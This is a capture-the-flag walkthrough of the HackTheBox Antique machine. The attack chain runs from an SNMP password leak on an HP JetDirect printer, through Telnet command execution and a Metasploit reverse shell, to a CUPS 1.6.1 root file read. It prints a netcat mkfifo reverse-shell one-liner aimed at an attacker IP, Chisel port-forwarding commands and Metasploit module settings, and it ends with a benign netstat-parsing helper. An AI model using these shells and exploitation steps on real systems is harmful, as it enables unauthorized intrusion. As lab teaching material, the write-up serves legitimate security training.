We covered a printer exploitation scenario built around the Telnet service and SNMP: we used SNMP to grab the hex representation of the device password through a vulnerability affecting HP JetDirect printers. With the decoded password we got a Telnet shell, and from there we used the available commands to spawn a reverse shell with Metasploit. We then discovered a local printing service on port 631 (CUPS 1.6.1) with a vulnerability that allows reading any file on the target system, and used Metasploit port forwarding to access and interact with it. This was part of the HackTheBox Antique machine.

Initial Reconnaissance: Exploiting SNMP

My journey began with initial reconnaissance. Starting from an nmap scan (which I assumed had already been done), I knew that UDP port 161, used for the Simple Network Management Protocol (SNMP), was open.

  • To interact with the printer via SNMP, I used the snmpwalk tool. I tried the common default “community string” of “public.”
  • My initial snmpwalk command helped me grab a banner, confirming it was an HP printer.
  • Then, I used a specific snmpwalk command (which targets an old vulnerability in some printers that store passwords in plain text) to extract information. This command returned a hexadecimal value.
  • I took this hex value to CyberChef, converted it from hex, and successfully revealed a plain text password! I learned that this particular exploit works on certain HP JetDirect printer models.

Gaining Initial Access: Telnet Login

The nmap scan also showed that the Telnet port (TCP 23) was open.

  • I connected to the machine using Telnet with the command: telnet <machine_IP>.
  • The Telnet banner confirmed it was an “HP JetDirect” printer, which aligned perfectly with my SNMP findings.
  • I used the password I had just obtained from the SNMP exploit to log in via Telnet.
  • Once logged in, typing ? showed me the available commands. I noticed an interesting exec command, which suggested I could execute system commands.
  • I tested this with exec id to confirm command execution, and it showed my user as “lp.”

Upgrading My Shell: Metasploit Magic

A basic Telnet shell isn’t ideal for extensive work, so I decided to upgrade to a more stable Metasploit Meterpreter shell.

  • I launched msfconsole.
  • I used the exploit/multi/script/web_delivery module.
  • I set the SRVHOST and LHOST options to my machine’s IP address.
  • Metasploit then generated a Python reverse shell command for me.
  • Back in my Telnet session, I executed this Python command (I had to prefix it with python3 for it to work correctly). This successfully gave me a Meterpreter session!
  • I also noted that alternatives like a Netcat or Bash reverse shell could have been used instead of Metasploit.

Privilege Escalation: Exploiting CUPS

From my Meterpreter session, I needed to escalate my privileges to root.

  • I dropped into a system shell using the shell command.
  • I navigated to /home/lp to grab the user flag.
  • During my enumeration (checking network connections with a command like netstat -tulnp), I discovered that port 631 was listening locally on the target machine. This port is used for the Common Unix Printing System (CUPS).
  • Since CUPS was only accessible locally on the target, I needed to set up port forwarding to access it from my attack machine.
  • Within my Metasploit Meterpreter session, I used the portfwd command: portfwd add -L 7000 -p 631 -r 127.0.0.1. This command forwarded connections from port 7000 on my machine to port 631 on the target’s localhost.
  • With port forwarding active, I opened a browser on my machine and navigated to http://127.0.0.1:7000, which displayed the CUPS web interface.
  • The CUPS page showed the version as 1.6.1.
  • I quickly searched for exploits for this CUPS version and found one that allows for root file read.
  • Back in msfconsole (after backgrounding my Meterpreter session), I searched for a post-exploitation module for CUPS: search type:post name:cups.
  • I selected the post/multi/escalate/cups_root_file_read module.
  • I set the SESSION option to the ID of my active Meterpreter session (which was 1).
  • Crucially, I changed the FILEPATH option from the default /etc/shadow to /root/root.txt to directly retrieve the root flag.
  • Running the exploit successfully read the root.txt file, and the contents (the flag!) were saved to a local file on my machine, with Metasploit providing the exact path.
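The enumeration step above (spotting CUPS on port 631 bound only to 127.0.0.1) is easy to miss when eyeballing netstat output, so here is an added helper, not from the original writeup, that parses `netstat -tulnp` output and reports which listening ports are reachable only from the host itself. The netstat sample is constructed to mirror the Antique box; the PIDs and program names are made up.

```python
# Added example: classify netstat -tulnp listeners by exposure (not from the writeup).
import ipaddress
from dataclasses import dataclass

# Constructed sample in `netstat -tulnp` layout; PIDs and names are invented.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      612/python3
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      640/cupsd
tcp6       0      0 ::1:631                 :::*                    LISTEN      640/cupsd
udp        0      0 0.0.0.0:161             0.0.0.0:*                           598/snmpd
"""

@dataclass(frozen=True)
class Listener:
    proto: str
    address: str
    port: int
    program: str

    @property
    def loopback_only(self) -> bool:
        """True when the socket is reachable only from the host itself."""
        return ipaddress.ip_address(self.address).is_loopback

def parse_netstat(text: str) -> list[Listener]:
    """Return one Listener per socket row in netstat -tulnp output."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith(("tcp", "udp")):
            continue  # skip header lines and anything that is not a socket row
        # Split "addr:port" on the last colon so IPv6 addresses survive intact.
        addr, _, port = fields[3].rpartition(":")
        last = fields[-1]  # "PID/Program name" column (UDP rows have no State)
        program = last.split("/", 1)[1] if "/" in last else "-"
        listeners.append(Listener(fields[0], addr, int(port), program))
    return listeners

def pivot_only_ports(listeners: list[Listener]) -> set[int]:
    """Ports never bound to a routable address: only reachable after landing on
    the host, which is exactly why CUPS on 631 needed port forwarding here."""
    exposed = {l.port for l in listeners if not l.loopback_only}
    return {l.port for l in listeners if l.loopback_only} - exposed

if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("loopback-only ports:", sorted(pivot_only_ports(rows)))  # [631]
```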

Alternative Approaches (Beyond Metasploit)

I also considered how I could have achieved this without relying so heavily on Metasploit, which is useful for OSCP preparation:

  • For the reverse shell, instead of web_delivery, I could have used a standard Netcat reverse shell command, such as: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_IP> <your_port> >/tmp/f.
  • For port forwarding without Metasploit’s portfwd (and if SSH wasn’t an option), I could have used a tool called Chisel.
    • On my attacker machine, I’d set up the Chisel server: chisel server -p <chosen_port> --reverse.
    • On the target machine (as the client), I’d run: chisel client <attacker_IP>:<chisel_server_port> R:7000:127.0.0.1:631 (forwarding my local port 7000 to the target’s localhost port 631).
  • Once the port was forwarded with Chisel, I could then use a standalone exploit script for the CUPS vulnerability to read the root flag via the shell obtained from Netcat.

In essence, this machine was a fantastic demonstration of how chaining weaknesses across management protocols and services such as SNMP, Telnet and CUPS can lead to full system compromise.

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
